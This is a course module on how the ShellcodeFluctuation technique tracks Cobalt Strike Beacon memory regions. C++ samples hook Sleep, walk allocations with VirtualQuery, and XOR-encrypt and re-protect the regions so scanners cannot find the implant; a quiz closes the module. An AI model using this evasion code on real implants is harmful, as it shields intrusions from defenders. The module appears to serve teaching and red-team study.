Difficulty: Intermediate

Module 6: Shellcode Region Tracking

Identifying shellcode allocation boundaries, using VirtualQuery for page-aligned operations, and supporting complex memory layouts.

Module Objective

Learn how ShellcodeFluctuation identifies the shellcode memory region boundaries when the MySleep hook fires, how VirtualQuery provides page-aligned region information, how to handle shellcode that spans multiple memory regions, and the challenges of tracking dynamically allocated sub-regions.

1. The Region Discovery Problem

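When the Beacon shellcode calls Sleep and control transfers to MySleep, the hook handler needs to know exactly which memory region to encrypt. This is not always straightforward.

Region Discovery Challenges

The challenges covered in this module are these: the hook receives no base address or size from its caller, so it must either rely on state recorded by the loader or discover the region itself (Sections 3 and 8); an implant may span several regions with different protections inside one allocation (Section 5); and memory the implant allocates at runtime, such as Beacon's heap, lies outside the original allocation (Section 6).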

2. VirtualQuery: The Region Inspector

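VirtualQuery is the primary API for discovering memory region properties. Given any address, it rounds that address down to a page boundary and reports that page's base address, the base of the allocation it belongs to, the size of the run of pages from that point on that share the same attributes, and the run's state, protection, and type: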

// VirtualQuery signature
SIZE_T VirtualQuery(
    LPCVOID                   lpAddress,  // Any address in the region
    PMEMORY_BASIC_INFORMATION lpBuffer,   // Output structure
    SIZE_T                    dwLength    // Size of output structure
);

// The MEMORY_BASIC_INFORMATION structure
typedef struct _MEMORY_BASIC_INFORMATION {
    PVOID  BaseAddress;       // Base of the page containing lpAddress
    PVOID  AllocationBase;    // Base of the entire allocation
    DWORD  AllocationProtect; // Initial protection at VirtualAlloc time
    SIZE_T RegionSize;        // Size of contiguous pages with same attributes
    DWORD  State;             // MEM_COMMIT, MEM_RESERVE, MEM_FREE
    DWORD  Protect;           // Current protection
    DWORD  Type;              // MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE
} MEMORY_BASIC_INFORMATION;

Two fields are especially important for shellcode tracking:

Field | Meaning | Use in Fluctuation
AllocationBase | The base address returned by the original VirtualAlloc call | Identifies the start of the entire shellcode allocation
RegionSize | Size of contiguous pages with identical protection/state/type | Defines how much memory to encrypt (may be less than total allocation if protection varies)
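How the three address-related fields relate to a queried address is easiest to see with numbers. The sketch below is a portable simulation rather than a call into the Windows API: Run, QueryResult, and SimQuery are hypothetical names, and the arithmetic mirrors the documented behavior that the query address is rounded down to a page boundary and RegionSize is counted from that page to the end of the run of same-attribute pages.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

constexpr std::uintptr_t kPage = 0x1000;  // 4 KB page, assumed for this sketch

// Hypothetical description of one run of pages with identical attributes.
struct Run {
    std::uintptr_t start;           // first byte of the run (page-aligned)
    std::size_t    size;            // length of the run in bytes
    std::uintptr_t allocationBase;  // base of the allocation the run belongs to
};

// Hypothetical mirror of the fields discussed in the table above.
struct QueryResult {
    std::uintptr_t baseAddress;
    std::uintptr_t allocationBase;
    std::size_t    regionSize;
};

// Simulates what a query for addr inside run would report.
QueryResult SimQuery(const Run& run, std::uintptr_t addr) {
    assert(addr >= run.start && addr - run.start < run.size);
    const std::uintptr_t pageBase = addr & ~(kPage - 1);  // round down to page
    return {pageBase, run.allocationBase,
            static_cast<std::size_t>(run.start + run.size - pageBase)};
}
```

For a run starting at 0x1A1000 with size 0x5000 inside an allocation based at 0x1A0000, querying 0x1A3456 yields BaseAddress 0x1A3000, AllocationBase 0x1A0000, and RegionSize 0x3000. The reported size shrinks when the query lands in the middle of a run, which is why the walks in this module start from AllocationBase.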

3. Discovering Shellcode Boundaries at Hook Time

ShellcodeFluctuation can discover the shellcode region boundaries dynamically when the hook fires, using the return address on the stack:

// Dynamic region discovery using _ReturnAddress()
void WINAPI MySleep(DWORD dwMilliseconds) {
    // The return address points into the shellcode that called Sleep
    PVOID callerAddr = _ReturnAddress();

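    // Query the memory region containing the caller
    MEMORY_BASIC_INFORMATION mbi = {};
    if (VirtualQuery(callerAddr, &mbi, sizeof(mbi)) == 0) {
        // Query failed, so mbi holds no valid data. A real handler
        // would sleep without fluctuating here (not shown).
        return;
    }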

    // mbi.AllocationBase = start of the shellcode allocation
    // Now walk all committed regions in this allocation
    LPVOID regionBase = mbi.AllocationBase;
    SIZE_T totalSize = 0;

    MEMORY_BASIC_INFORMATION walkMbi;
    LPVOID walkAddr = regionBase;

    while (VirtualQuery(walkAddr, &walkMbi, sizeof(walkMbi))) {
        // Stop if we've left the allocation
        if (walkMbi.AllocationBase != regionBase)
            break;

        // Only count committed regions
        if (walkMbi.State == MEM_COMMIT) {
            totalSize = (SIZE_T)((BYTE*)walkMbi.BaseAddress +
                        walkMbi.RegionSize - (BYTE*)regionBase);
        }

        walkAddr = (BYTE*)walkMbi.BaseAddress + walkMbi.RegionSize;
    }

    // Now we know: regionBase and totalSize
    // Proceed with fluctuation...
}

Why Use _ReturnAddress()?

_ReturnAddress() is an MSVC compiler intrinsic, declared in <intrin.h>, that returns the address of the instruction in the caller that will execute after the current function returns. When MySleep is called (via the hooked Sleep), the return address points into the Beacon shellcode. This gives us an address inside the shellcode allocation without needing to track it globally from the loader.
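The walk in MySleep can be traced without the Windows API by running the same loop over a hand-written region table. The sketch below is a portable simulation, not code from ShellcodeFluctuation: SimRegion, kCommit, kReserve, CommittedExtent, and SampleLayout are hypothetical names, and the table stands in for what successive VirtualQuery calls would report.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Hypothetical stand-in for the MEMORY_BASIC_INFORMATION fields the walk reads.
struct SimRegion {
    std::uintptr_t baseAddress;
    std::uintptr_t allocationBase;
    std::size_t    regionSize;
    int            state;
};

constexpr int kCommit  = 1;  // plays the role of MEM_COMMIT
constexpr int kReserve = 2;  // plays the role of MEM_RESERVE

// Returns the distance in bytes from allocationBase to the end of the last
// committed region in that allocation. Regions must be sorted by address.
std::size_t CommittedExtent(const std::vector<SimRegion>& regions,
                            std::uintptr_t allocationBase) {
    std::size_t total = 0;
    bool inside = false;
    for (const SimRegion& r : regions) {
        assert(r.regionSize > 0);  // a zero-size region would stall a real walk
        if (r.allocationBase != allocationBase) {
            if (inside) break;     // we have left the allocation
            continue;              // allocation not reached yet
        }
        inside = true;
        if (r.state == kCommit)    // only committed regions extend the total
            total = (r.baseAddress + r.regionSize) - allocationBase;
    }
    return total;
}

// Made-up layout: the allocation at 0x1A0000 has a reserved hole and tail.
std::vector<SimRegion> SampleLayout() {
    return {
        {0x190000, 0x190000, 0x10000, kCommit},   // unrelated earlier allocation
        {0x1A0000, 0x1A0000, 0x3000,  kCommit},
        {0x1A3000, 0x1A0000, 0x2000,  kReserve},  // reserved hole
        {0x1A5000, 0x1A0000, 0x1000,  kCommit},
        {0x1A6000, 0x1A0000, 0xA000,  kReserve},  // reserved tail
        {0x1B0000, 0x1B0000, 0x10000, kCommit},   // next allocation
    };
}
```

For this layout, CommittedExtent(SampleLayout(), 0x1A0000) is 0x6000. That extent runs across the reserved hole at 0x1A3000, so a single pass over (regionBase, totalSize) would touch uncommitted pages. This is one reason Section 5 records each committed region separately.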

4. Page Alignment and VirtualProtect

VirtualProtect operates on page boundaries. Understanding page alignment is critical for correct fluctuation:

// x86-64 page size
#define PAGE_SIZE 0x1000  // 4096 bytes

// VirtualProtect rounds addresses DOWN to page boundary
// and sizes UP to include all affected pages.

// Example:
// shellcodeBase = 0x1A0000 (page-aligned, from VirtualAlloc)
// shellcodeSize = 0x4C800 (not page-aligned)

// VirtualProtect(0x1A0000, 0x4C800, PAGE_READWRITE, &old)
// Actually affects every page from the one at 0x1A0000 through the
// one at 0x1EC000, i.e. bytes 0x1A0000 - 0x1ECFFF
// That's ceil(0x4C800 / 0x1000) = 77 pages

// VirtualAlloc always returns page-aligned addresses:
LPVOID base = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE,
                           PAGE_READWRITE);
// base is guaranteed to be 0x????0000 (64K aligned on Windows)

Page Alignment Guarantees

API | Base Address Alignment | Size Alignment
VirtualAlloc | 64 KB (allocation granularity) | Rounded up to page size (4 KB)
VirtualProtect | Rounds down to page boundary | Rounds up to include full pages
VirtualQuery | Reports page-aligned regions | Reports page-aligned sizes

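Because VirtualAlloc returns 64 KB-aligned addresses and rounds the allocation up to whole pages, every page that VirtualProtect touches for a (base, size) pair taken from that allocation lies inside it, so the fluctuation operates cleanly on aligned memory regions. This holds only while base and size describe the VirtualAlloc allocation itself. A range that starts or ends mid-page in memory shared with other data would change the protection of that neighboring data too.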
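The rounding rules in the table can be checked with plain integer arithmetic. The following is a minimal sketch, assuming a 4 KB page as in the PAGE_SIZE define above; PageSpan and AffectedPages are hypothetical names, and the function only computes which pages a protection change on a byte range would cover without calling any Windows API.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

constexpr std::uintptr_t kPageSize = 0x1000;  // 4 KB, assumed for this sketch

struct PageSpan {
    std::uintptr_t first;  // address of the first affected page
    std::uintptr_t end;    // one past the last affected byte (page-aligned)
    std::size_t    pages;  // number of affected pages
};

// Computes the pages that contain at least one byte of [addr, addr + size).
PageSpan AffectedPages(std::uintptr_t addr, std::size_t size) {
    assert(size > 0);
    const std::uintptr_t mask  = ~(kPageSize - 1);
    const std::uintptr_t first = addr & mask;                           // round down
    const std::uintptr_t end   = (addr + size + kPageSize - 1) & mask;  // round up
    return {first, end, static_cast<std::size_t>((end - first) / kPageSize)};
}
```

AffectedPages(0x1A0000, 0x4C800) gives 77 pages ending at 0x1ED000, matching the worked example. AffectedPages(0x1A0FF0, 0x20) gives two pages, because a 32-byte range that straddles a page boundary pulls in both pages.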

5. Multi-Region Shellcode

Complex implants may not have a single contiguous memory region. A reflective DLL loader, for example, maps different PE sections with different protections:

// Reflective DLL memory layout example:
// AllocationBase = 0x1A0000
//
// Region 1: 0x1A0000 - 0x1A0FFF  PE headers  (PAGE_READONLY)
// Region 2: 0x1A1000 - 0x1A5FFF  .text       (PAGE_EXECUTE_READ)
// Region 3: 0x1A6000 - 0x1A7FFF  .rdata      (PAGE_READONLY)
// Region 4: 0x1A8000 - 0x1A9FFF  .data       (PAGE_READWRITE)
// Region 5: 0x1AA000 - 0x1AAFFF  .reloc      (PAGE_READONLY)

// Each region has different protection. We need to:
// 1. Save each region's current protection
// 2. Flip ALL to RW
// 3. Encrypt ALL
// 4. After sleep: Decrypt ALL
// 5. Restore EACH region's original protection

To handle this, the fluctuation code must walk the entire allocation and process each region individually:

struct RegionInfo {
    LPVOID  base;
    SIZE_T  size;
    DWORD   originalProtect;
};

// Walk the allocation and collect all committed regions
std::vector<RegionInfo> CollectRegions(LPVOID allocationBase) {
    std::vector<RegionInfo> regions;
    MEMORY_BASIC_INFORMATION mbi;
    LPVOID addr = allocationBase;

    while (VirtualQuery(addr, &mbi, sizeof(mbi))) {
        if (mbi.AllocationBase != allocationBase)
            break;

        if (mbi.State == MEM_COMMIT) {
            regions.push_back({
                mbi.BaseAddress,
                mbi.RegionSize,
                mbi.Protect
            });
        }

        addr = (BYTE*)mbi.BaseAddress + mbi.RegionSize;
    }

    return regions;
}

// Encrypt all regions
void EncryptAllRegions(std::vector<RegionInfo>& regions, DWORD key) {
    for (auto& r : regions) {
        DWORD oldProt;
        VirtualProtect(r.base, r.size, PAGE_READWRITE, &oldProt);
        r.originalProtect = oldProt;  // Save actual protection
        xor32((BYTE*)r.base, r.size, key);
    }
}

// Decrypt and restore all regions
void DecryptAllRegions(std::vector<RegionInfo>& regions, DWORD key) {
    for (auto& r : regions) {
        xor32((BYTE*)r.base, r.size, key);
        DWORD dummy;
        VirtualProtect(r.base, r.size, r.originalProtect, &dummy);
    }
}
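The save, flip, transform, restore bookkeeping can be exercised on an ordinary byte buffer. The sketch below is a simulation under stated assumptions, not the course's implementation: Prot, SimRegionInfo, XorBytes, EncryptAll, DecryptAll, and SampleRegions are hypothetical names, protections are plain enum values instead of page attributes, and XorBytes is a stand-in whose details may differ from the xor32 helper used above.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

enum class Prot { ReadOnly, ExecuteRead, ReadWrite };

// Simulated region: an offset into one buffer instead of a real address.
struct SimRegionInfo {
    std::size_t offset;
    std::size_t size;
    Prot        current;   // stands in for the live page protection
    Prot        original;  // filled in when the region is flipped to RW
};

// Hypothetical XOR helper: applying it twice with the same key is a no-op.
void XorBytes(std::uint8_t* p, std::size_t n, std::uint32_t key) {
    for (std::size_t i = 0; i < n; ++i)
        p[i] ^= static_cast<std::uint8_t>(key >> (8 * (i % 4)));
}

void EncryptAll(std::vector<std::uint8_t>& mem,
                std::vector<SimRegionInfo>& regions, std::uint32_t key) {
    for (auto& r : regions) {
        assert(r.offset + r.size <= mem.size());
        r.original = r.current;                        // 1. save protection
        r.current  = Prot::ReadWrite;                  // 2. flip to RW
        XorBytes(mem.data() + r.offset, r.size, key);  // 3. encrypt
    }
}

void DecryptAll(std::vector<std::uint8_t>& mem,
                std::vector<SimRegionInfo>& regions, std::uint32_t key) {
    for (auto& r : regions) {
        XorBytes(mem.data() + r.offset, r.size, key);  // 4. decrypt
        r.current = r.original;                        // 5. restore protection
    }
}

// The five-region layout from the example above, as offsets from 0x1A0000.
std::vector<SimRegionInfo> SampleRegions() {
    return {
        {0x0000, 0x1000, Prot::ReadOnly,    Prot::ReadOnly},     // PE headers
        {0x1000, 0x5000, Prot::ExecuteRead, Prot::ExecuteRead},  // .text
        {0x6000, 0x2000, Prot::ReadOnly,    Prot::ReadOnly},     // .rdata
        {0x8000, 0x2000, Prot::ReadWrite,   Prot::ReadWrite},    // .data
        {0xA000, 0x1000, Prot::ReadOnly,    Prot::ReadOnly},     // .reloc
    };
}
```

Running EncryptAll followed by DecryptAll with the same key over a 0xB000-byte buffer leaves both the bytes and each region's protection as they started, which is the invariant the per-region originalProtect field exists to preserve.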

6. Handling the Beacon Heap

Cobalt Strike Beacon allocates heap memory for its configuration, task buffers, and downloaded data. This heap data can contain IOCs (C2 URLs, decrypted task output, etc.) that scanners can find. The possible approaches differ in how much of this memory they cover:

Approach | What Gets Encrypted | Heap Coverage | Complexity
Single allocation only | The original VirtualAlloc region containing the shellcode | None: heap is unprotected | Simple
All private executable | All MEM_PRIVATE regions with execute permissions | Partial: misses RW heap data | Moderate
Full allocation walk | All committed regions under the same AllocationBase | Good: covers co-allocated regions | Moderate
Heap tracking | Hook HeapAlloc/VirtualAlloc to track all implant allocations | Full: covers all implant memory | High

Practical Limitation

ShellcodeFluctuation's primary focus is the shellcode execution region (the code itself). Beacon's heap allocations for configuration and data buffers are separate and may not be covered by the basic fluctuation mechanism. More advanced solutions like Cobalt Strike's built-in Sleep Mask Kit provide broader coverage of Beacon-owned memory.

7. Thread Safety Considerations

If the implant uses multiple threads, the fluctuation mechanism must handle concurrency:

// Potential race condition:
//
// Thread 1 (Beacon): Calls Sleep -> MySleep encrypts shellcode
// Thread 2 (Worker): Still executing shellcode code
//
// If Thread 2 is running when Thread 1 encrypts, Thread 2
// will execute encrypted garbage and crash!

// ShellcodeFluctuation assumes single-threaded shellcode:
// Cobalt Strike Beacon calls Sleep from its main loop,
// and worker tasks complete before the sleep cycle.

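// For multi-threaded implants, a more robust approach.
// This sketch assumes g_fluctLock was initialized once with
// InitializeCriticalSection and that every thread increments
// g_activeThreads while it runs shellcode and decrements it
// when it reaches a safe point.
CRITICAL_SECTION g_fluctLock;
volatile LONG    g_activeThreads = 0;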

void WINAPI MySleep_ThreadSafe(DWORD dwMilliseconds) {
    EnterCriticalSection(&g_fluctLock);

    // Wait for all other threads to reach a safe point
    while (InterlockedCompareExchange(&g_activeThreads, 0, 0) > 1) {
        LeaveCriticalSection(&g_fluctLock);
        SwitchToThread();
        EnterCriticalSection(&g_fluctLock);
    }

    // Safe to encrypt - only this thread is active in shellcode
    // ... perform fluctuation cycle ...

    LeaveCriticalSection(&g_fluctLock);
}

Single-Thread Assumption

In practice, ShellcodeFluctuation operates under the assumption that the Beacon is single-threaded at the point it calls Sleep. Cobalt Strike Beacon dispatches jobs synchronously in its main loop and only calls Sleep when all pending tasks are complete. This makes the single-thread assumption safe for the primary use case.

8. Region Tracking Summary

The complete region tracking approach used by ShellcodeFluctuation combines static initialization with dynamic verification:

// Complete region tracking flow in MySleep:
void WINAPI MySleep(DWORD dwMilliseconds) {
    // Step 1: Start from pre-configured global state
    // (Set during initialization by the loader)
    LPVOID base = g_state.shellcodeBase;
    SIZE_T size = g_state.shellcodeSize;

    // Step 2: Dynamic discovery as a cross-check (more robust)
    // Uses _ReturnAddress() to find caller's allocation.
    // If the query fails, base keeps the global value.
    MEMORY_BASIC_INFORMATION mbi = {};
    if (VirtualQuery(_ReturnAddress(), &mbi, sizeof(mbi)) != 0)
        base = mbi.AllocationBase;
    // A full implementation would also walk the allocation here
    // to recompute size (see Section 3)

    // Validate: is this the expected region?
    if (base != g_state.shellcodeBase) {
        // Unexpected caller - could be a different thread
        // or the shellcode relocated. Use global state as fallback.
        base = g_state.shellcodeBase;
        size = g_state.shellcodeSize;
    }

    // Proceed with fluctuation using (base, size)
    FluctuateCycle(base, size, dwMilliseconds);
}
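The validation step in the flow above compares allocation bases. A related check, whether the caller's address falls inside the recorded (base, size) range at all, is plain arithmetic and can be sketched portably. Range and Contains are hypothetical names introduced for illustration. They are not part of ShellcodeFluctuation.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Hypothetical record of the range saved by the loader.
struct Range {
    std::uintptr_t base;
    std::size_t    size;
};

// True when addr lies in [base, base + size). Written as a subtraction so
// that base + size cannot overflow near the top of the address space.
bool Contains(const Range& r, std::uintptr_t addr) {
    assert(r.size > 0);  // an empty range suggests missing initialization
    return addr >= r.base && addr - r.base < r.size;
}
```

With the range (0x1A0000, 0x4C800) from Section 4, Contains accepts 0x1A0000 and 0x1EC7FF and rejects 0x19FFFF and 0x1EC800.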

Key Takeaways

Knowledge Check

Q1: What does VirtualQuery's AllocationBase field represent?

A) The page-aligned base of the queried address
B) The base address of the process heap
C) The base address returned by the original VirtualAlloc call that created the allocation
D) The lowest address in the process address space

Q2: Why might a reflective DLL's memory layout require per-region protection tracking?

A) Reflective DLLs use PAGE_GUARD on all pages
B) Different PE sections (.text, .rdata, .data) have different original protections that must be individually restored
C) Reflective DLLs cannot be encrypted with XOR
D) Each section uses a different XOR key

Q3: How does ShellcodeFluctuation identify the shellcode region when the Sleep hook fires?

A) Uses pre-configured global state (base + size) set during initialization, optionally verified with _ReturnAddress() and VirtualQuery
B) Scans all process memory for executable private regions
C) Reads the shellcode path from a configuration file
D) Uses a hardware breakpoint to detect the shellcode region